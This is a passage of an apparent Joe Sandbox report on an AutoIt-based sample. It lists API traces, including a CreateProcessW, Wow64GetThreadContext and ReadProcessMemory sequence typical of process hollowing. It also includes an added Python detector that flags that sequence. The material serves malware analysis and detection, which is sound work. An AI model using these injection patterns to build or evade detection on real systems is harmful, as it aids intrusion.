                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                      • API String ID: 2673923337-2727554177
                                                      • Opcode ID: 56e65f9146bfb9a370625621f31c52b84ba1e81e5ddaa9fae432f13bfe86dde0
                                                      • Instruction ID: b06216eb676adee6b3af8fde80600a5e4632302a89b446e98ee08caf04557ea5
                                                      • Opcode Fuzzy Hash: 56e65f9146bfb9a370625621f31c52b84ba1e81e5ddaa9fae432f13bfe86dde0
                                                      • Instruction Fuzzy Hash: 26716771548301DEC724EF65ED859ABBBF8FF99340B40092EF445871A1EF30994ACBA6

                                                      Control-flow Graph

                                                      APIs
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00A63A62
                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00A63A71
                                                      • LoadIconW.USER32(00000063), ref: 00A63A88
                                                      • LoadIconW.USER32(000000A4), ref: 00A63A9A
                                                      • LoadIconW.USER32(000000A2), ref: 00A63AAC
                                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00A63AD2
                                                      • RegisterClassExW.USER32(?), ref: 00A63B28
                                                        • Part of subcall function 00A63041: GetSysColorBrush.USER32(0000000F), ref: 00A63074
                                                        • Part of subcall function 00A63041: RegisterClassExW.USER32(00000030), ref: 00A6309E
                                                        • Part of subcall function 00A63041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A630AF
                                                        • Part of subcall function 00A63041: InitCommonControlsEx.COMCTL32(?), ref: 00A630CC
                                                        • Part of subcall function 00A63041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A630DC
                                                        • Part of subcall function 00A63041: LoadIconW.USER32(000000A9), ref: 00A630F2
                                                        • Part of subcall function 00A63041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A63101
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                      • String ID: #$0$AutoIt v3
                                                      • API String ID: 423443420-4155596026
                                                      • Opcode ID: 6602bcf19e1ab5c7e4c3543cc9aacfedac8a0b7f8d09452c907dc424c89b57c2
                                                      • Instruction ID: 8c5cb0a92b33b1de955ec003e22128d91731e2546f7e3ccf2a42ff08e031cf6a
                                                      • Opcode Fuzzy Hash: 6602bcf19e1ab5c7e4c3543cc9aacfedac8a0b7f8d09452c907dc424c89b57c2
                                                      • Instruction Fuzzy Hash: E9215C71D00344EFEB21DFA4EC49B9D7BB4FB08710F00422AF504AB2A0DBBA56568F84

                                                       Control-flow Graph: function starting at a63633, blocks reaching DefWindowProcW, KillTimer, SetTimer, RegisterWindowMessageW, CreatePopupMenu, PostQuitMessage, MoveWindow and SetFocus (rendered graph and executed / not-executed block colouring not reproduced)
                                                      APIs
                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 00A636D2
                                                      • KillTimer.USER32(?,00000001), ref: 00A636FC
                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A6371F
                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A6372A
                                                      • CreatePopupMenu.USER32 ref: 00A6373E
                                                      • PostQuitMessage.USER32(00000000), ref: 00A6375F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                      • String ID: TaskbarCreated
                                                      • API String ID: 129472671-2362178303
                                                      • Opcode ID: db14a5ed133c16f5a433f29240ab2d8cab517efd350fa949e0fcc1c1e5734dc0
                                                      • Instruction ID: 5344276f236adfb3bfe867b3c25230c8c54feee811312db2e455a42b74e8ae8d
                                                      • Opcode Fuzzy Hash: db14a5ed133c16f5a433f29240ab2d8cab517efd350fa949e0fcc1c1e5734dc0
                                                      • Instruction Fuzzy Hash: 0F4138B3204185BBDF24DF68ED49B7A37B5EB14300F140129F6029B2A1DF749E439761

                                                      Control-flow Graph

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                      • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                      • API String ID: 1825951767-3513169116
                                                      • Opcode ID: 8187f19d57b256ac77d5998d84da75c00c8d0baae3b382c5f30b1d4095908a99
                                                      • Instruction ID: e64ba2713faea2bbc8534341ca98a79b726af5ed184d520b3252d22e1349edd0
                                                      • Opcode Fuzzy Hash: 8187f19d57b256ac77d5998d84da75c00c8d0baae3b382c5f30b1d4095908a99
                                                      • Instruction Fuzzy Hash: 6AA14F72910229AACF14EBA0CD95EEEB7B8FF14700F14052AF416B7191DF759A0ACB60

                                                       Control-flow Graph: function starting at 3d82620 in the non-PE region, a loop over CreateFileW, VirtualAlloc, ReadFile, FindCloseChangeNotification and VirtualFree that re-enters at 3d826d5 (rendered graph and executed / not-executed block colouring not reproduced)
                                                      APIs
                                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03D826F1
                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03D82917
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1399187842.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3d80000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: CreateFileFreeVirtual
                                                      • String ID:
                                                      • API String ID: 204039940-0
                                                      • Opcode ID: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
                                                      • Instruction ID: f86c16a0db831eced69bd11a5a93d0d51a61d0d596ded6e49bdc960051e37837
                                                      • Opcode Fuzzy Hash: c69e8af538ca099f1199ea1a41374fe769c00d7324591793f5319154b009097c
                                                      • Instruction Fuzzy Hash: 8BA10774E00209EBDF14DFA4C894BAEBBB5FF48704F248999E505BB280D775AA41CF54

                                                       Control-flow Graph: single basic block a639e7-a63a57 calling CreateWindowExW * 2 and ShowWindow * 2 (rendered graph not reproduced)
                                                      APIs
                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00A63A15
                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A63A36
                                                      • ShowWindow.USER32(00000000,?,?), ref: 00A63A4A
                                                      • ShowWindow.USER32(00000000,?,?), ref: 00A63A53
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Window$CreateShow
                                                      • String ID: AutoIt v3$edit
                                                      • API String ID: 1584632944-3779509399
                                                      • Opcode ID: d96e73a1a4edbef729d69ad993fc76d496e46530b22faaf61b57b943fa8963d4
                                                      • Instruction ID: b9451fcd8ffd34f9eacd9aac6ab2d4f8fe6e6f255dfdb878affa7c834f941c52
                                                      • Opcode Fuzzy Hash: d96e73a1a4edbef729d69ad993fc76d496e46530b22faaf61b57b943fa8963d4
                                                      • Instruction Fuzzy Hash: 0CF0B771641290FEEA3157676C49E773F7DE7C6F50B01412AB904E7160CAB51852DAB0

                                                       Control-flow Graph: function starting at 3d82410 in the non-PE region, blocks calling CreateFileW, VirtualAlloc, ReadFile and, on one path, ExitProcess at 3d825c1 (rendered graph and executed / not-executed block colouring not reproduced)
                                                      APIs
                                                        • Part of subcall function 03D82300: Sleep.KERNELBASE(000001F4), ref: 03D82311
                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03D8250A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1399187842.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3d80000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: CreateFileSleep
                                                      • String ID: PQ9EOIJH7CD3J
                                                      • API String ID: 2694422964-827068972
                                                      • Opcode ID: 0c7f9290556646d91bf9e677257f0cab2358981354ac30b8a5e06a1a8c088c88
                                                      • Instruction ID: 1d56f2fb009c25b85993435eeadbac57e1589f0426b3283ec8de63d77f1512d1
                                                      • Opcode Fuzzy Hash: 0c7f9290556646d91bf9e677257f0cab2358981354ac30b8a5e06a1a8c088c88
                                                      • Instruction Fuzzy Hash: 62517171D44249EAEF10EBE4C818BEFBBB8AF44700F004599E609BB2C0D7795B45CBA5

                                                       Control-flow Graph: function starting at a6410d, blocks reaching LoadStringW and Shell_NotifyIconW (rendered graph and executed / not-executed block colouring not reproduced)
                                                      APIs
                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00A9D5EC
                                                        • Part of subcall function 00A67D2C: _memmove.LIBCMT ref: 00A67D66
                                                      • _memset.LIBCMT ref: 00A6418D
                                                      • _wcscpy.LIBCMT ref: 00A641E1
                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00A641F1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                      • String ID: Line:
                                                      • API String ID: 3942752672-1585850449
                                                      • Opcode ID: bc4a9c8872eb1b5a0435be1db704f5308d0d0a764984fb70bc70b2b7d52feb70
                                                      • Instruction ID: cb19a1ac89d6524cabfe95ed1aebeb3b82c8563cb40c452fdd568bf24f78d616
                                                      • Opcode Fuzzy Hash: bc4a9c8872eb1b5a0435be1db704f5308d0d0a764984fb70bc70b2b7d52feb70
                                                      • Instruction Fuzzy Hash: C331BF71408354AAD732EB60DD46FEF77F8AF49304F104A1AF195930A1EF74AA49CB92

                                                       Control-flow Graph: function starting at a8564d, internal calls only, no Win32 API at any block (rendered graph and executed / not-executed block colouring not reproduced)
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                      • String ID:
                                                      • API String ID: 1559183368-0
                                                      • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                                      • Instruction ID: ba9bd34f2afb8e15b99f185c96669866f275a8613c08693e028b72a31a8ba0cf
                                                      • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                                      • Instruction Fuzzy Hash: AE518234E00B05DFDB24AFB9C98466E7BB6AF40320F68CB29FC25962D0E7759D509B50
                                                      APIs
                                                        • Part of subcall function 00A64F3D: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00B262F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00A64F6F
                                                      • _free.LIBCMT ref: 00A9E68C
                                                      • _free.LIBCMT ref: 00A9E6D3
                                                        • Part of subcall function 00A66BEC: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00A66D0D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: _free$CurrentDirectoryLibraryLoad
                                                      • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                      • API String ID: 2861923089-1757145024
                                                      • Opcode ID: e6655fd045b813986d3e9daf80fd750b18286854d4b17a854a32b7e4e3d954c0
                                                      • Instruction ID: 7c5e944cc4bd0f3a1829fa6c0f204157765c41f885e965eda53e0dac0367bde8
                                                      • Opcode Fuzzy Hash: e6655fd045b813986d3e9daf80fd750b18286854d4b17a854a32b7e4e3d954c0
                                                      • Instruction Fuzzy Hash: 99914C71A10219EFCF04EFA4CD919EDB7B4FF19314F14446AF816AB2A2EB31A945CB50
                                                      APIs
                                                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00A635A1,SwapMouseButtons,00000004,?), ref: 00A635D4
                                                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00A635A1,SwapMouseButtons,00000004,?,?,?,?,00A62754), ref: 00A635F5
                                                      • RegCloseKey.KERNELBASE(00000000,?,?,00A635A1,SwapMouseButtons,00000004,?,?,?,?,00A62754), ref: 00A63617
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: CloseOpenQueryValue
                                                      • String ID: Control Panel\Mouse
                                                      • API String ID: 3677997916-824357125
                                                      • Opcode ID: e6c7c34067526e360a187870d034a854afb2e61eb0fcfc524b485283589438fc
                                                      • Instruction ID: f49d6c3b762e1d947d8666f0ff9b4cc26c68135e2eb745866f52c44d68540ec1
                                                      • Opcode Fuzzy Hash: e6c7c34067526e360a187870d034a854afb2e61eb0fcfc524b485283589438fc
                                                      • Instruction Fuzzy Hash: A711487A510218BFDF20CFA8DC809AFB7B8EF04740F008469E805DB210E2719F429760
                                                      APIs
                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 03D81ABB
                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03D81B51
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03D81B73
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1399187842.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_3d80000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                      • String ID:
                                                      • API String ID: 2438371351-0
                                                      • Opcode ID: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
                                                      • Instruction ID: 27b2090232afb4fb3a97f67b2c989c620a1b376c7870b4d76c3c32db55c14a39
                                                      • Opcode Fuzzy Hash: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
                                                      • Instruction Fuzzy Hash: F4621B34A14258DBEB24DFA4C840BDEB376EF58700F1091A9D10DEB390E775AE85CB59
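                                                       The three calls listed above (CreateProcessW, Wow64GetThreadContext with ContextFlags 00010007, a 4-byte ReadProcessMemory) sit in the non-PE region at 03D80000 alongside the CreateFileW / VirtualAlloc / ReadFile loops, and the report's own signatures ("Modifies the context of a thread in another process", "Writes to foreign memory regions") describe what follows them. The Python below is an added example, not part of the Joe Sandbox report: it parses lines in the report's "APIs" bullet format, names the Win32 constants in the CreateFileW and Wow64GetThreadContext arguments (GENERIC_READ, OPEN_EXISTING, CONTEXT_FULL), and flags the ordered CreateProcessW → Wow64GetThreadContext → ReadProcessMemory triple. The sample lines are copied from this page; treating that triple as the opening of 32-bit process hollowing is the analyst's heuristic, not something the report asserts. The decoder deliberately refuses a CreateFileW line whose printed slot count differs from the 7-parameter prototype, because the report sometimes prints extra stack slots ahead of the real parameters (compare the ten-slot line at ref 03D826F1 with the seven-slot line at ref 03D8250A).

```python
"""Decode Joe Sandbox 'APIs' lines and flag the hollowing prefix (added example)."""
import re
from typing import Dict, List, NamedTuple, Optional, Union

Arg = Union[int, str]  # 8-hex-digit slots become int; "?" and string literals stay str


class ApiCall(NamedTuple):
    api: str
    module: str
    args: List[Arg]
    ref: int  # call-site address printed after "ref:"


# Constructed input: API lines copied from this report, in the report's own format.
SAMPLE_LINES = [
    "• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03D8250A",
    "• CreateProcessW.KERNELBASE(?,00000000), ref: 03D81ABB",
    "• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03D81B51",
    "• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03D81B73",
    "  • Part of subcall function 03D82300: Sleep.KERNELBASE(000001F4), ref: 03D82311",
    "• CreatePopupMenu.USER32 ref: 00A6373E",
]

# Handles the "Part of subcall function ...:" prefix and calls printed without "(...)".
_LINE_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
_HEX8_RE = re.compile(r"^[0-9A-Fa-f]{8}$")

_GENERIC = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
            0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
_SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
_DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
_ATTRS = {0x80: "FILE_ATTRIBUTE_NORMAL", 0x04000000: "FILE_FLAG_DELETE_ON_CLOSE",
          0x40000000: "FILE_FLAG_OVERLAPPED"}
_CONTEXT = {0x10000: "CONTEXT_i386", 0x1: "CONTEXT_CONTROL", 0x2: "CONTEXT_INTEGER",
            0x4: "CONTEXT_SEGMENTS", 0x8: "CONTEXT_FLOATING_POINT",
            0x10: "CONTEXT_DEBUG_REGISTERS", 0x20: "CONTEXT_EXTENDED_REGISTERS"}

# Analyst's heuristic, not a statement from the report: this ordered triple is how
# 32-bit process hollowing from a WoW64 parent opens, before unmap/write/resume.
HOLLOWING_PREFIX = ("CreateProcessW", "Wow64GetThreadContext", "ReadProcessMemory")


def parse_api_line(line: str) -> Optional[ApiCall]:
    """Parse one bullet of the report's 'APIs' list; None if the line is not one."""
    m = _LINE_RE.match(line)
    if not m:
        return None
    args: List[Arg] = []
    if m.group("args"):
        for tok in m.group("args").split(","):
            tok = tok.strip()
            args.append(int(tok, 16) if _HEX8_RE.match(tok) else tok)
    return ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16))


def _bits(value: int, table: Dict[int, str]) -> List[str]:
    """Expand a bitmask into known flag names, keeping leftover bits as hex."""
    names = [name for bit, name in table.items() if value & bit]
    rest = value & ~sum(table.keys())
    if rest:
        names.append(f"0x{rest:X}")
    return names


def decode_call(call: ApiCall) -> Dict[str, object]:
    """Name the Win32 constants in the calls of interest. Slot count must match the
    documented prototype; the report can print extra stack slots ahead of the real
    parameters, and decoding those positionally would mislabel them."""
    out: Dict[str, object] = {"api": call.api, "ref": f"{call.ref:08X}"}
    if call.api == "CreateFileW" and len(call.args) == 7:
        access, share, _sec, disp, attrs, _tmpl = call.args[1:7]
        out["desired_access"] = _bits(access, _GENERIC) if isinstance(access, int) else access
        out["share_mode"] = _bits(share, _SHARE) if isinstance(share, int) else share
        out["disposition"] = _DISPOSITION.get(disp, f"0x{disp:X}") if isinstance(disp, int) else disp
        out["attributes"] = _bits(attrs, _ATTRS) if isinstance(attrs, int) else attrs
    elif call.api == "Wow64GetThreadContext" and len(call.args) == 2 and isinstance(call.args[1], int):
        cf = call.args[1]
        out["context_flags"] = ["CONTEXT_FULL"] if cf == 0x10007 else _bits(cf, _CONTEXT)
    elif call.api == "ReadProcessMemory" and len(call.args) == 5:
        out["bytes_requested"] = call.args[3]
    else:
        out["note"] = f"{len(call.args)} slot(s) printed; not decoded"
    return out


def has_hollowing_prefix(calls: List[ApiCall]) -> bool:
    """True when HOLLOWING_PREFIX appears as an ordered subsequence by call-site address."""
    names = iter(c.api for c in sorted(calls, key=lambda c: c.ref))
    return all(any(n == want for n in names) for want in HOLLOWING_PREFIX)


def analyze(lines: List[str]) -> Dict[str, object]:
    calls = [c for c in (parse_api_line(l) for l in lines) if c]
    return {"decoded": [decode_call(c) for c in calls],
            "hollowing_prefix": has_hollowing_prefix(calls)}


if __name__ == "__main__":
    result = analyze(SAMPLE_LINES)
    for item in result["decoded"]:
        print(item)
    print("hollowing prefix:", result["hollowing_prefix"])
```

                                                       Ordering by call-site address stands in for execution order, which is adequate inside one function listing such as the 03D81ABB–03D81B73 block above; across functions the report's timestamps would be needed instead.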
                                                      APIs
                                                        • Part of subcall function 00A65045: _fseek.LIBCMT ref: 00A6505D
                                                        • Part of subcall function 00AC99BE: _wcscmp.LIBCMT ref: 00AC9AAE
                                                        • Part of subcall function 00AC99BE: _wcscmp.LIBCMT ref: 00AC9AC1
                                                      • _free.LIBCMT ref: 00AC992C
                                                      • _free.LIBCMT ref: 00AC9933
                                                      • _free.LIBCMT ref: 00AC999E
                                                        • Part of subcall function 00A82F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00A89C64), ref: 00A82FA9
                                                        • Part of subcall function 00A82F95: GetLastError.KERNEL32(00000000,?,00A89C64), ref: 00A82FBB
                                                      • _free.LIBCMT ref: 00AC99A6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                       • Associated: 00000000.00000002.1398573729.0000000000A60000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000AEF000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398676754.0000000000B15000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398726191.0000000000B1F000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1398739533.0000000000B28000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                      • String ID:
                                                      • API String ID: 1552873950-0
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                      • String ID:
                                                      • API String ID: 2782032738-0
                                                      APIs
                                                      • _memset.LIBCMT ref: 00A9EE62
                                                      • GetOpenFileNameW.COMDLG32(?), ref: 00A9EEAC
                                                        • Part of subcall function 00A648AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A648A1,?,?,00A637C0,?), ref: 00A648CE
                                                        • Part of subcall function 00A809D5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00A809F4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: Name$Path$FileFullLongOpen_memset
                                                      • String ID: X
                                                      • API String ID: 3777226403-3081909835
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1398602149.0000000000A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A60000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_a60000_opp46lGmxd.jbxd
                                                      Similarity
                                                      • API ID: __fread_nolock_memmove
                                                      • String ID: EA06
                                                      • API String ID: 1988441806-3962188686
                                                      APIs
